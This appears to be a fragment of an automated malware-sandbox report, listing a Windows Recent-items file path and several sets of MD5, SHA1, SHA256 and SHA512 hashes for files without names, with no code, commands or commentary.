SHA5128febcb5eb55d7969d8eba98293a138cb435993390db865eb06fe6a80c2ceb9c91f1174ab957f22f7e754fcc13733ca5ad871332ab8fb590600002b19637c8905
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5213ec77f56ab0691d0b4e8546031f143
SHA1a49d41a230c3d246d2868d071670c28ea257b2f8
SHA256fabd8ee78b221f077fb552296220957ffc79b09493bf18c7133abb6518c800b8
SHA5128febcb5eb55d7969d8eba98293a138cb435993390db865eb06fe6a80c2ceb9c91f1174ab957f22f7e754fcc13733ca5ad871332ab8fb590600002b19637c8905
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5213ec77f56ab0691d0b4e8546031f143
SHA1a49d41a230c3d246d2868d071670c28ea257b2f8
SHA256fabd8ee78b221f077fb552296220957ffc79b09493bf18c7133abb6518c800b8
SHA5128febcb5eb55d7969d8eba98293a138cb435993390db865eb06fe6a80c2ceb9c91f1174ab957f22f7e754fcc13733ca5ad871332ab8fb590600002b19637c8905
-
MD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
38ca099785e8d2627d2b4f2b77f74a5a
SHA196fb1a0e1573f5c05186c8d955ee3f04d3c7fed4
SHA2566994850a1f465eaa42bdcb597334388b06ab4d2651f69d19ecddfa68939b35ab
SHA5122315df429f5405ced24ae2129c3c0fb79df84bc5c6a9dde26255111e711c66c86d4ea34cfb0857dfca8912d12f459dbaa52424335188fef7257ac201cc10c76c
-
MD5
65eea99fef8efb737550c3b443894c87
SHA15b420915206645cdffac0f88e5df2c9e92a0e2f6
SHA25698805952a1fae22c415327830501e2b3bdbfb449769e16cb6e5a367eb95f8607
SHA512416a90aed8107b8837abcdcef1d23684d9c836031dc2fa590108d7858716645234a557cd5a76e41e0df83590b42199db4935151464d865b914f2c6828d7b1f61
-
MD5
0750828e5a80dae0280c43945332e145
SHA1fa1c85c33c0b99f8df14b6ccbd37f5df3d62c30c
SHA256637dd8f4245397e281bf84433f75eeb40461e70e81a11a4c2c252dc8f9e4b947
SHA512a45f4023f5d8951fef44bbe830c1b8992e7cb9c013882048d7227bac0c76869584c1ccc1d323803ced7a1e353998d0bface12eb9ef1dcd04e8e39b155528fd14
-
MD5
0941efccfdbde6a619081456be071102
SHA14d9079f335bfdb4e88e022ffdd2193c4561f099d
SHA25699dbace98f5f29a5c0c962db270dc195a8b6d2f8dbb009b79b929ff9d68d8281
SHA512bbb587471dec6beae7852ae2ee1fff0efb26ce57ab69dbaf4385c965bf09a31be60c67951e52f488866daa0effab715e6b1a0aca5b02a7fdcc5dd586d84d56ab